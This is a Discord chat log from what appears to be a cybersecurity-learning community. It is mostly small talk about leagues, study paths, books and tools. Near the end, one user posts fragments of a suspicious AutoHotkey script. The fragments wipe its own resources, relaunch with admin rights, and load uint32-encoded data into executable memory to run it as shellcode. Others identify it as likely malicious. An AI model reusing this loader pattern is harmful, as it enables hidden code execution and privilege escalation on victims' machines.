#general
1 messages Β· Page 1025 of 1
we've had a cav for like a year now
Nice!
oh shit nvm its gone -_-;
my mom is obsessed with pupies lol
ok guess ill make a folder for it that is a good idea jasko
Lo
Change the text to plain?
@mossy river Can you please check your dms?
πππ€
i like the bash green color tho
I'll let you know if i ever find a better way to handle it haha
cool thanks
Hm actually been thinking about it all wrong, might have been a settings issue @crystal mauve check this out:
By default, attachments are added to the root of your vault.
You can change the default attachment location under Settings β Files & Links β Default location for new attachments.
This way you'll at least get all of them in the same place and not a new note in root. π
I don't have obsidian on this machine though so can't try it out now.
Without plugins you can choose to have attachments stored in 1 of 4 places, The main vault folder, in a specific folder, in the current working directory, or in a subfolder in the current directory. The last option is my personal favorite.
Oh there is a subfolder in current dir option? Hell yeah
Yes
ill try that i gtg, pos el bandito box keeps dropping on me
Damn, good luck!
π«
Please don't promote other communities here
best and worst; meant nothin by it pal :)
Man, I have many regrets
You're a pretty decent and well spoken mod by the looks of it. I don't know why he would call you such a thing, unless You did him wrong
scrubz is the only mod so i said scrubs is the worst mod and the best mod
@sick lance Did you sign then? π
Scrubz has a deferred deadline
oh
Oh yea, I forgot to apply
can still apply even tho it says "1 yr of joining the server atleast" ?
yes
Dang
ehhh , i dont feel like applying tho, doesnt seem right to me ...atleast not yet
Well I guess I can't be a mod then
Copy that, i am sorry!
Not realy
if it says 1 year at least then if you've been in this server for less than a year, there's 0 chance
There is always a chance
anyways, anyone had a high school yearbook?
if yes what quotes did you guys have?
We never had those
same
Nope, sadly we don't do it where I live I think. You wanna go with something poetic, motivational or maybe just funny?
I would probably choose something similar i have as a new years resolution every year.

My New Years Resolution is to come up with a better New Years Resolution.
I already sent mine lmfao, I found one in the internet that fits my school and it's ironic imo "If idiots could fly, this place would be an airport"

Meanwhile my college launders money even for Farewell
|| I didnt Give lmao, Keep your Stupid Farewell to yourself I won't even come||
My new years resolution is nothing. I don't have one.
You should take mine
What's your new years resolution?
To come up with a better new years resolution. π
I've had it for the past 10 years, it's great.
π
You're just like me
I find writting somewhere about your goals for the year pointless
The chances of divine intervention is very slim
Haha damn

Looking for E.snowdenπ

Noot noot
Holy shit it's @errant umbra
Hoya
How we doing?
And what's the take on randos sending friend requests in here? Got one the other day, but they haven't been mentioned in here yet
How're you doing?
join the specific server
Itβs part of the clan stuff
Pretty good. Finished my Maltego AI project, now I'm on the hunt for a model that's useful to me. So far, no luck
π₯π₯π₯π€
And yes, I will never stop advertising my project lol
Think you create a discord clan or something
arrives
I have to turn huggingface to ollama, but 9/10 times, it never works. So stuck with Ollama right now, and their selection is kinda shit
Before y'all ask: https://huggingface.co/
Local LLM?
Yeeep
What new news
You do anything cool with Home Assistant?
Hahahaha no
news new what
Like new vulnerablity new path
idk
Want my Maltego stuff? lmfao
Just search beerrise. 
Where your Ai lets say it
@sick lance Permission to post my project? It's killing me 
Lets see it
Don't really know what that is
I don't do drugs.
π
Not an OSINT fan I see
I am haven't used maltego all that much π
Damn I forgot
Howdy
Hi can anyone help me in connection vpn to my wsl kali
VPN is successfully connected but during my ice attack server room
I trying to run exploit it's not listening to lhost
On port 4444
Tell me more
Ok
Oh the joys of model comparison
What exactly bro?
No. Lol
I'm ok, you?
I ask the different models a simple question. "WHo owns TryHackMe" I'm getting , "It's owned by an Indian company, it's owned by Ben and Liam, it's owned by Left Hand and Right Hand"
uuuuh
How are you an entrepeanour? tell me about your company and products.
Hey Toast, how's you?
Yeeee haaaaw
It's a long rabbithole
I can't about one i got a warning before on this server ππ, but the other two is selling IT services and electronics repair service, wbu?
What was the no π
Rn starting a pen testing company
Specialized security services everyone needs, but no one offers π
I'm having a chill weekend with family, good to hear you're doing ok
Ya bro I am starting a pen testing buisness rn although I don't have much experience with pen testing compared to other IT fields
How many pens have you tested?
how many companies do you already have?
I mean, one of those is right (as far as I'm aware)
But will hire ppl to do the testing and I handle the buisness
Ben and Liam was close, Ben and Ashu. But no model can give me Ashu.
1 bro, and 2 side hustles
A.. ah ... ASHU
interesting, well good luck
Sorry, had to sneeze
lol
Ty, do u have a company or buis?
Gave +1 Rep to @cosmic pendant (current: #44 - 220)
Yeah
That's a really good point (Sorry Ashu), I blame 3 gins, a couple glasses of wine and some prosecco
Tell me more bro
A free opportunity to flash here lol
I'm good here π
Hhh ok u want to stay more annonnymous?
YAWN
Or is it an underground buisness ππ
Oh boy
Get him!
You started this π
How good at you at cybersecurity?
coffee cake
as in get him cake
I would say average for now, I have sec+ and 3 other certs of completation about cybersec
Where you from tech entrepreneur
Profile says expert, just wondering π
Planet earth bro
ha ha ha
Bro don't expose me π
does any of you are working as a freelance in pentesting ?
Oh boy
Nah bro but I am starting a pen testing company
THis is like when you get 2 ais to talk to each other
Are you old enough to start a company?
Yes ofc, bro I have 1 already and 2 side hustles π
Let's play a game.
My first buisness i started when I was 15
Huh?
and how is it going?
oh noes toaster is planning a saw like game

you say bro in 13% of your messages
I just made the logo with Ai and wrote content for the ad but didn't go public yet
Gym hit me
are we talking about the falling in the needles type of saw?

I will this month tho
u got website ?
Just so i understand, you're starting a pentesting company but you're not a pentester yourself? You instead want to do the "business side of the company" and hire pentesters to do the work?
ππokay bro
Nah just testing the market
he is
yeah
can u root an easy box on htb atleast mr pentester?
Yes bro, ik the basics of pen testing but not an expert
But with buisness i am so good
ignores me
Nah ur trolling
how did your previous businesses end up?

lets do a chall
Sounds amazing, do you need investors? I am willing to invest 69 million right now.
mr pentester answer me!!
U need to test the market in ur area before u spend thousand of dollars
shhh, he's an Enterpenter
How did you test the market?
(challenge)
Yes bro give me that money π
What type?
idk , ask him he said that
mr pentester
answer me!!
Hhh ik
Heya
π¦ΉββοΈ
3 hours left to the league
almost #1 π
Someone is trying to take my place 
haha
how many points ya got
hope i dont get stuck at bronze
2.5k?????????
damn
that would be a dream haha
Been doing challenges finally
last week i was first and didnt promote
I will get #1 in gold I will grind all night if I have to
I don't think anyone is in gold atm
yeah I mean next league
Right right
It will get difficult π
Shiny pixels make me get dopamine tho
these leagues are quite nice feature
My Unemployment ahh can do it
Silver badge now, maybe sometime I'll demote to get the bronze one
gg
I can see this guy is active now
That's the plan
Hello team! Hope everyone is doing well! Quick question⦠how long should I study with the SOC Simulator exclusively to be well prepared for the SAL 1 cert exam? TIA!!
Enough to understand everything π
I'd say the SOC L1 learning path is good
The new SOC challenges too. They go over how you need to cover the 5 W's in the resolution/notes
what league are you in
Silver
yo is there competition to leagues π
Huh
Are there any Admins on that I can message regarding an IRL subject? I just want to clarify the grounds on something. its not shady or illegal, its in fact the opposite. Its a business venture that revolves around Linux and the Ethical Hacking community as a whole!
Leagues are grouped by your location iirc
oh
You're not in the same location as me, so you're not going to see me
is there a way to view ur global ''rank''
the guy on the rank # 2 is from france
It makes it doable lol, LoL did a similar thing
Yeah, check the leaderboard. Or your profile
@Dong woo check the rules again we donβt send unsolicited friend requests!
aight
Everyone in my league is from the same country
If your country is small I'd assume you're grouped with another one
i've gotten like 4 fqs already bro ts shady af π
I have no clue how it works
bouta get andrew tate tryna sell me a course on here
What
oh you dont get shady friend request from accounts made today?
No
First time
lol
yo im a fan man
Am sorry about that am an just bored
no way dong woo

What do you want me to do about that?
I sell a course, well I advertise it! https://www.tryhackme.com/
Should buy this fr fr
Good deal
sorry mate already have that π
Definitely not the way to unbore yourself lol
How!!
dong woo lets both buy that course
Ok
where's my cut bro ^^ im a walking advertisement
i want at least 5%
you'd not even get the 0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000001% deal
i really want that deal
well it was worth a try
Up to 400 points over the other guy. Feeling a bit more confident
im coming just wait
Don't think we're in the same league lol
i know π
:0
I thought u didn't know π
SELECT GROUP_CONCAT(name SEPARATOR β & β) AS name_nonzero
FROM hacking_tools
WHERE SUBSTRING(amount, -1, 1) != 0;
where's the failure?
OH MY GOD nvm sorry
one space to much π
Got it sorted?
ya
Nice
i just had two spaces instead of one space π
Lol, got there eventually
Not gonna answer that on a public discord server
okay
I was sad really I stopped learning cybersecurith
Security
Because my laptop my reapir
Can I pop out THM's vms in a seperate window/tab?
I've just stretched it to 4/5 the screen for now lol
today on finds shadow had no idea how they missed for so long: https://www.gog.com/en/partner/free_games
does anyone did the lofi challenge yet?
π€π€.
Great π€
Yeah
GOG is soooo good. You get games with the same discount or even cheaper, and the best part is there is no client and the games just run without even needing internet
no problem silas and ciju
DRM free wahoo
yeah the drm free is a huge thingy for shadow
Love it
Thank you
Gave +1 Rep to @sand trench (current: #4 - 2129)
it makes preserving games for the future easier
^ yuups
u mean devtools?
No, shadow had a good screenshot
nope... refer to image posted by shadow
got a few images for help with tryhackme stuff saved as gifs to have them in gif favourites on discord :D
Nice
I need a proper screen recorder now. I used to use sharex for quick gifs
what do you need help with
can I dm?
@jaunty charm hey much respect man you have been smoking me in the king of the hill challenges
What level of knowledge do you have?
Also there is a channel #bug-bounty
You might need to verify to access it
ive been going at it with dompriv lol hes 3 and 0 on me that dude is a beast
Hihi
im taking a break and brain storming before i start up again i just got whooped on 3 times in a row haha
alright if you wnat to play jsut dm me
How is everyone doing?
im getting overwhelmed by burp suit and u
I'm doing well, just catching up on learning Powershell
im doing the basics now π
THM is great for a lot but check out portswigger academy to learn burp suite. its free and they have some apprenteice and practitioner level courses that go over a bunch of different topics
Hi everyone, I'm new to pentesting and following the Premium Roadmap. Any book recommendations that match it would be awesome!
Cyberjutsu is a good one, paints the picture in a metaphorical context
Books that were recommended to me:
Linux Basics for hackers by OTW
Javascript for hackers by Gareth Heyes (portswigger employee)
Real world bug hunting: A field guide to web hacking by Peter Yaworski
Black hat python: Pythona Programming for Hackers and Pentesters by Justin Seitz and Tim Arnold
Hacking APIs by Corey J Ball
+1 fpr OTW, and for Black Hat Python!
sup guys
admittedly have only gone through linux for hackers and part of js for hackers so far but got all of them right here next to me, my to-do list lol
There is a second edition of Linux Basics for Hackers coming out this summer
Is it a second part of the book or just a version with updated tools?
Updated/revised:
"New to this edition: This second edition has been updated to address recent changes to Kali and Linux, including a more secure approach to root privileges, updates to Bluetooth and Linux logging functions, and a new chapter with advice on AI in cybersecurity."
oohh very nice ty
Gave +1 Rep to @cosmic minnow (current: #549 - 11)
thats exciting, the first edition is getting a bit dated at this point given it was written in 2018 but i'd still give it your time if you're new
cuz why not both :~)
Tryhackme should get the guild tag "THM" for discord
I think they can spare 3 server boosts
servers get tag with boosts ?
What are people waiting for ? π
Anyone want to program cybersec tools and pen test tools with me via python dm π
has anyone taken these courses https://institute.sektor7.net/
whats your opinion if you have?
Offensive code development, offensive coding, malware development course, red team operator
Offensive coding? Is that just developing tools?
meep moop it is the time for sleep sloop while the beeps are blasting the boops
Night night
yes AV bypassing and stuff
Sleep sloop to the beep boops 
Liberating the webs what is that
A CTF from the looks of it
Cool
You have made it?
π€π
Great
yessir
Look I love cybersecurity but I stopped
Because my laptop in repair and I have great path from zero to hero
nice. goodluck with the repair
From redteaming in tryhackme
Blue team attack aws defend I want to deep in
i run everything from a chromebook
Chromebook opreating system
no and yes
i send my condolences π
chrome os but i use kali linux in the linux container VM
If you install termux you can do some OverTheWire on mobile
I want to be dev frontend back end for bug bounty &
AI
is back end and front end stopped
No
why cant i send images
./verify
./verify
Front end might go less technical. Back end still needs people who understand architecture ig
No
where do i find my discord token
In your TryHackMe profile
Go here
At the bottom you'll see the token
Can you explain
You mean front end is easy but backend is hard?
Front end looks like it can be done by AI or LLMs a bit easier. CSS and HTML is pretty easy to grasp and most sites can just use templates changed slightly to match their needs. Back end requires a bit more technical knowledge IMO.
IMO what is
In my opinion
I love advnture it without Ai for both of them
What do you mean?
Yeah you can do better if you know CSS and JS
But LLM tools do a good job at giving you a basic website
I dont want
But this far path
Frontend and back end
So close
And Ai because I have my only path
Nice job verifying!
the pollen though π
kali linux on chromebook
Eek, could you not just get a CLI version?
this was free for me and its all i have so im just using what ive got
Fair enough
Is it rly that important to have 8gb or better ? Nmap doesnβt look like it needs much
Depends what you need to do, 8GB is fine though π€·ββοΈ
guys is it just me or does using git clone download really slowwwww
like 100 kbps...
the seclist wordlists
ahhhhhh nice
So long u canβt just copy paste it ?
If you need a wordlist on the fly it's worth downloading it
π ummmmmm
maybe that could have been smart..
I might have done that room that your doing cause I remember this situation
N someone on vc suggested to copy paste it
Room?
not a room, just setting up my vm
o then prob worth the wait
i dont need metasploit right?
π¦
for what
Iβve used it twice , but it seems a very good tool
msfconsole has over 2500 exploits
so last 2 things i need to download are metasploit and burp suite
You don't need it no, but it makes things easy
Do you just have a base Debian install?
base ubuntu
I donβt understand how u select what exploit to use on metasploit , it brings back so many hits
the best testers I know started off with base ubunutu, then ran thir own setup scripts they wrote to install the tools they used
use
?
i tried arch, then i screwed up the font and somehow deleted the whole system stuff, no clue how i did it
soooo
i rage quit...
and downloaded ubuntu
I've never seen arch in any professional enviorment ever
That's sick. I like when people have their own tools. I'm more blue teamish but it's cool when someone has their own little toolset
I don't know anyone that uses it, i'm not even sure it's allowed.
Yo sup chat
There's a lot of elitism with it
π
π
Arch is not allowed ?
In a professional environment probably not
What are we talkin bout?
Yeah, in alot of enviorements, it isn't on the baseline
Almost always either ubunutu/kali and/or Redhat/Centos
ubuntu and kali are just better
Oh weird
If you set up Arch, an achievement bar pops up irl not even capping trust
there are specliaty things like Alpine and another one..... I don't remember the name of, but you don't test on them, they are base OS for containers
I mean it's not the industry standard in the slightest
3 minutes left, I think I'm getting this #1 badge 
also guys whats the difference between just saving and "writting out" whatever that means
How many pts u got
2666
Ok?
sounds exciting
Why?
Idk just curious
only if they accept
I'd like to thank my friends and family
Whys that relevant tho
Not relevant Iβm drinking
Nice
lol big brain n total domination
Did u get a badge from that as well?
Yeah
So u get a badge from all ranks
Now time to derank so you can collect the badge for 2nd. place EZ Clap
I got the bronze one last week lol
W plan
I got demoted, been stuck on el bandito for a fking week
I won't lie I'm tempted
is it that bad?
lesgoo
new pixel color
dopamine goes BRRRR
hello, finallly finished pre security. Im confused on what i do next. help please.
That would be ranks
Iβm prob just bad, the box drops connections to established connections itβs rly annoying
Move on to the next on the path
Go to learning paths
ye gold league
oh, and i just complete all of them?
I've heard that the thing it uses is unstable
I've not tried it yet tho
gotta try at some point too
It's not so much about completing, remember to learn on the way too π
Yeah
but with free path u can't
all of em
Yeah first time Iβve had to use t4
thx, i pay tho
Gave +1 Rep to @bleak quartz (current: #2819 - 1)
ye alr
Local FIle Incusion (LFI) and Remote FIle Inclusion (RFI) examples done on pentest-ground.com DVWA page.
nice pfp btw
I think itβs like a hidden challenge, but Iβm about to just skip it. Will give it a final go tomorrow
thanks !
Gave +1 Rep to @delicate mist (current: #2819 - 1)
U didnβt pay for a sub?
I did
O yeah, easy 125$ to spend not sure if any other website offers similar value
top 15 this time right?
yes
HackTheBox has a confusing payment method lol
I mean course providers do but the business model is different
The prices are higher since it's more personal teaching
A bit
Portswigger ?
Buying tokens for rooms is just weird
Yeah thatβs weird but what if u paid for a certification ? Is that just to take the test ?
Or does it include set modules
You need to buy a separate voucher in order to pass an exam for certs
I've a certif for C lang from a uni and how it worked was that they gave you points based off your assignments, and then for the final exam they gave points, then from that they create the grade
O wat, u donβt get a shot at the cert w a 400$+ payment ?
lol I thought it was 2 tries for the payment
Oh I didn't understand what u asked, ofc it includes everythign u need for the exam
Depends on your subscription though, there is 1 free voucher if you buy an yearly subscription
But for the monthly one it is just cubes and discounts
Usually u can also talk to ppl who are also taking it
I got a bunch of new friends from it
hello please who has can do this room :Mayhem (Can you find the secrets inside the sea of mayhem?) ,i need to help thank you
Although you will have 2 chances to pass the exam, if you fail first one, they give 2nd chance
After that it costs money
Pay2win π₯
Yeah, you have to buy another voucher if you fail 2 times in a row
Oh, I was thinking of doing the bug bounty cert on htb next but the general consensus on bug bounties here in the thm community seems to be that bug bounties are shit
Tbf certificate for bug hunting is not that necessary, i mean you can do it with no certificate
Just go to hackerone yeah
Right but in general, attempting to catch bugs doesnβt seem very,,, fruitful ?
Might look good on a CV, but I don't think it'll be as well recognized as the CEH, as badly as it's seen by people who know about it.
Yeah
Have u tried Silas?
lol Iβve met a couple
Have u tried to find bugs on hacker one ?
Tyler rambsy however u spell his name said he found 1 bug and this is recently , got 500$ that seems like pretty dire results from someone who is a professional in the field
Have any of u gotten paid off hacker one?
Nope, still pretty new to bug hunting
I do blue team stuff
I've friends who do have earned some amounts
but generally from what I've heard it's very saturated
harsh
its blue
And?
Okay
U didnβt get into the Sherlockβs on htb Silas?
how long does it take for a write up to be reviewed?
i had a whole debate which is better red or blue at a bsides confersense
if anyone tryna get good with Linux https://overthewire.org/wargames/bandit/bandit0.html
This website is great yo
300 elven years
Both are needed
both good!
I have no clue what you mean
OverTheWire is great
Pretty easy to do on any platform too
i agree
I think I did some of it on my phone lmao
fr? lol, that sounds horrible. I respect the grind tho
Mine took like a day, but it was a brand new room
on phone?!
Psychopath
It's not bad, just termux and just some basic linux things lmao
i did mine on a type writer
oh cool. mine could be a while π
i did it on UA highschool
typewriter is crazy
xD
put doom on it
except the typewriter only had 0 and 1
From what I remember, the creators of a room get an email and review your writeup, so if it's an old room or it was made by an inactive member then you might be waiting a while.
π
i dont think there is a specific time frame. i believe the room creator has to review it so whenever they get to it.
ok thanks mate β€οΈ
Gave +1 Rep to @stoic quarry (current: #262 - 28)
Htb has blue team exercises called Sherlockβs
whats a good learning path after the basic ones? im not sure what I should do
Cool
anyone have any paths they like?
Depends if you want to do red or blue team
The silver league was intense jeez... π
pentester
pentetser okay. ill check that out
Nice
Is there any good apps for practicing on phone tho
All I've seen so far are just cash grabs
yea jus do it on a vm or sum
Yah good luck versusing dudes soloing 400-500 boxes
π
sometimes lol
same
imagine they made linux phones
W idea
whoever they is
lowkey
it would be a very targeted audience tho lol
@blissful pulsar U use obsidian right?
Librem 5, PinePhone, Pixel 3a with Ubuntu touch, Mobian
Was gonna mention these lol
oh shi
PinePhones are still pretty unusable imo
i didnt even know that
i just googled it lmao
What themes do you know on Obsidian?
if u knew about cyber glow you prob got some ones that idk about
I used to be pretty into the ol 'Use FOSS for everything' but when you need to make sure you can take a phone call, just use android lol
android is linux kernel anyway
It is, but it's so customized
I use a custom OS on my phone, but it still does the job lol
And Mac is Unix.
The only ORIGINAL is MS DOS, or windows.
wrong, my phone works on punch cards get rekt nerd
Yah? Mine runs on vacuum tubes!
Don't spam it broski
ight
i have a stone tablet that i etch and then throw at people if i want to text them, i get a bunch of packet loss tho
im still using bird couriers. i have a 100% packet loss
In computer networking, IP over Avian Carriers (IPoAC) is an ostensibly functional proposal to carry Internet Protocol (IP) traffic by birds such as homing pigeons. IP over Avian Carriers was initially described in RFC 1149 issued by the Internet Engineering Task Force, written by David Waitzman, and released on April 1, 1990. It is one of sev...
Anyone experienced with contract law?
a lawyer does
π±
I wouldn't ask a public discord server for legal advice lol
just break it you'll be fine
π€¨
Some what, I study law as a minor subject
cyber major law minor π
i forgot easter is a thing
same
i forgot it was today until my friend sent me a picture of easter candy he recieved
Just flexing on you that they got some snacks
fr π
They better have some snacks, especially today of all days.
π
fs
butter scotch is my go to
Grandma core
ye but butter scotch that isn't too chewy and sticky is hard to find
true
its like me making a play dough statue as a young kid and taking it to my mother
fs
believe me the urge as a 6 yr old is hard to contain
It still is
i know kids who would pray at night that all they would get on easter for candy was just play dough
π
scrumptious
how th does kurto already have 3k pts in gold league
I'm pretty confident that some people are just using walkthroughs
is that the info rooms?
yeah you can find them on medium
rip
Any room with a walkthrough
are different rooms worth different amounts of points?
Yeah
Some of the challenges give less than a walkthrough lol
like i see how leagues on duolingo prevent cheating bc even if you use google translate ur still learning, but the tryhackme leagues ppl just use walkthrough
not prevent cheating but like
i mean its not like ur getting 10 grand for doing it
true
You can just 'learn' your first language and it's easy
Or do basic maths for daily streaks
ye thats true
it hurts u if just do treat the leagues like that
kinda simulates life how some people try so hard just to get beaten by some mf that didn't do nun
yeah
Life imitates fart
wut

π€¨
any1 happen to know what could be encoding stuff like this?
s.="82u2743121017u895160179u3883746206u727095391u502829129u32358"
s.="80765u1938429751u1765800907u2453083554u1769241829u3528988340"
s.="u3618494392u2203323370u2831442214u341169495u2581586492u27823"
s.="19453u2400645623u454779685u2086799289u2565531983u4106162719u"
s.="1363915699u1502489242u1973361285u2968878163u2366286912u23556"
s.="94922u745262775u1072077468u3756448770u2403107813u777747911u1"
s.="714984265u3312111428u3209278845u3931591781u229598997u9520266"
s.="21u331879667u1555424721u2140521107u141087578u459781451u16906"```
the 3am challenge room rabbithole goes deep goodnight
old asf adobe flash?
its a part of an AHK code
but i have yet to find out what encoding method is this
is probably binary to text with ulnt32
What's this for?
its a random AHK code i found and got really curious about
cus there is alot of these encoded strings in there
I try decoding this one I think but the result is like "?".
Where'd you find it
and it had a bit of code checking for adminstrator privelages which got me suspicious
on a random discord i joined
if you decode this using python, the result is like ?????????? with emoji of skull.
cc @mossy river and or @sick lance Scroll down for convo
what decoding method did u use
Where did they find it?
Is this part of a CTF?
nah it isnt a discord related to cyber
it's related to tryhackme?
its js a dump for ahk codes and i was roaming around and found that
or not?
no
tried to decode with uint32 but it didnt work
just jiberrish
iterative decoding i think.
i rmmbr seeing this same method on one of john hammond's videos but i dont rmmbr how he went on decoding it
Is this an AHK script that can be used for cheating in a game?
not sure
i dont really wanana run it cus of that check i talked about
which is what got me invested cus why would it check for admin privileges
#NoEnv
#NoTrayIcon
#SingleInstance off
SetBatchLines, -1
ScriptGuard1()
ScriptGuard1() ; By TAC109
{
if (!A_IsCompiled)
return
For i,ahk in ["#1", ">AUTOHOTKEY SCRIPT<"]
if (rc:=DllCall("FindResource", "Ptr",0, "Str",ahk, "Ptr",10, "Ptr"))
&& (sz:=DllCall("SizeofResource", "Ptr",0, "Ptr",rc, "Uint"))
&& (pt:=DllCall("LoadResource", "Ptr",0, "Ptr",rc, "Ptr"))
&& (pt:=DllCall("LockResource", "Ptr",pt, "Ptr"))
&& (DllCall("VirtualProtect", "Ptr",pt, "Ptr",sz, "UInt",0x40, "UInt*",rc))
&& (InStr(StrGet(pt,20,"CP0"), "<COMPILER:"))
DllCall("RtlZeroMemory", "Ptr",pt, "UInt",sz)
}
full_command_line := DllCall("GetCommandLine", "str")
if not (A_IsAdmin or RegExMatch(full_command_line, " /restart(?!\S)"))
{
Try
{
if (A_IsCompiled)
Run *RunAs "%A_ScriptFullPath%" /restart
else
Run *RunAs "%A_AhkPath%" /restart "%A_ScriptFullPath%"
}
ExitApp
}```
here is the starting bit of the script btw
before all the jiberrish
Did you get this from a game cheat/hacking discord? That was more the question I was asking. You're being awfully cagey with information
yeah, that's the point.
It seems to just check for admin, kind of like anti extraction or anti cheat
bcs encoding this maybe result unreadable strings.
Oh my bad, as I said above I found it on a random script dump discord one of my buddies added me to, I asked him about it but he didn't reply yet so I thought to ask here
What's the point?
perchance
full_command_line := DllCall("GetCommandLine", "str")
if not (A_IsAdmin or RegExMatch(full_command_line, " /restart(?!\S)"))
{
Try
{
if (A_IsCompiled)
Run *RunAs "%A_ScriptFullPath%" /restart
else
Run *RunAs "%A_AhkPath%" /restart "%A_ScriptFullPath%"
This looks like priv esc
what i mean, you saying.
Hmm
not sure if it matters but its a toal off 670 lines, might be downloading dependencies in there
cus it seems awefully short for an encoded script of this type
as far as i know
VarSetCapacity(MyFunc, len:=StrLen(hex)//2)
Loop, % len
NumPut("0x" SubStr(hex,2*A_Index-1,2), MyFunc, A_Index-1, "uchar")
DllCall("VirtualProtect", "Ptr",&MyFunc, "Ptr",len, "uint",0x40, "Ptr*",0)
base:=DllCall("GetModuleHandle", "Str","Kernel32", "Ptr")
IfExist, %A_ScriptFullPath%
EnvSet, My_ScriptFullPath, %A_ScriptFullPath%
}
Loop, % A_Args.Length()
args.=" """ A_Args[A_Index] """"
s:=RegExReplace(str,"\s"), RegExReplace(s,"u","",size)
VarSetCapacity(str,(size+1)*4,0), s:=SubStr(s,InStr(s,"u")+1)
Loop, Parse, s, u
NumPut(A_LoopField, str, (A_Index-1)*4, "uint")
hThread:=DllCall("CreateThread", "Ptr",0, "Ptr",0, "Ptr"
, RegisterCallback("Thread","F"), "Ptr",0, "uint",0, "Ptr",0)
r:=DllCall(&MyFunc, "Ptr",base, "AStr",args, "Ptr",&str, "int",size)
if (hThread)
{
DllCall("TerminateThread", "Ptr",hThread, "Ptr",0)
DllCall("CloseHandle", "Ptr",hThread)
}
return r
}
Thread(p)
{
SetBatchLines, -1
DllCall("Sleep", "int",3000)
ExitApp
}```
found this in the middle
are you trying to get us to give you feedback on your malware rn>?
But why do you need this?
this is for sure no above board chief
Yea
is that what it said?
if decode each segment
ah
But alot of unreadable jibberish
If it's from discord, I wouldn't trust it
yeah
Unless it's a official source of anti cheat etc..
im probs gonna go around rewatching every john hammond vid i think ive watched to try and see if he mentioned this method in any of his videos
im very invested
you still havent said why you want this so you aint getting any more help from me kiddo
hm?
Yea I didn't think, I should probably think before I reply XD
Never said I wanted it? was just curious about it because I saw that it was checking if the script had admin privileges and had some hex stuff in there which got me curious
no thoughts only bleh
you don't really have to help though, I didn't specifically ask for help from you
agressive for no reason
youve been dodging questions and putting malicious scripts in chat
or at least parts of them
What part was malicious?
the privilege escalation and executing obfuscated shellcode at runtime part
And what would I benefit from putting a malicious code in a cybersecurity chat full of experts
you know, the two things you put in chat
Can't really say if it's malisons but it's sketchy
That alone can cause no harm?
And it isnt really malicious
Sounds like someone is having a bad day
It can look pretty sketchy though, as it does have encoded binary, memory wiping and restart to escalated privilege
so simple answer is just don't trust it
Yeah I know, but I was just curious about the encoding method thats all
Thought I could send extra snippets to help someone find it but ig it was taken the wrong way
alright if you were just curious for real then sorry, have a good night
Most people here are not experts
each string is segemented into 32bit by u is encoded binary to text
No worries, you too
Ah
Seems like a hassle to decode all of that, ill go ahead and run it on a vm tomorrow
For now Ill go to sleep, goodnight!
Hey guys
Does anyone have tips on where to study active directory
I find it really challenging
active directory?
Yes
The paths on the site?
Thanks
Help i keep getting disconnected from my machines
Try to ask in #site-support channel
hey i reached Voyager
Congrats , great job π π
Nice!
awesome π
Grats

If you're wondering where I stream, I stream on Twitch. turn on notifications to get notified when I go live.
TURN ON NOTIFICATIONS FOR ALL OF THESE RIGHT NOW BRUDDA
βΊTwitter: https://twitter.com/EV1Nlol
βΊTiktok: https://www.tiktok.com/@ev1nlol?lang=en
βΊdiscord: https://discord.gg/8UJYKDwf
You are literaly in thm discord go to thm

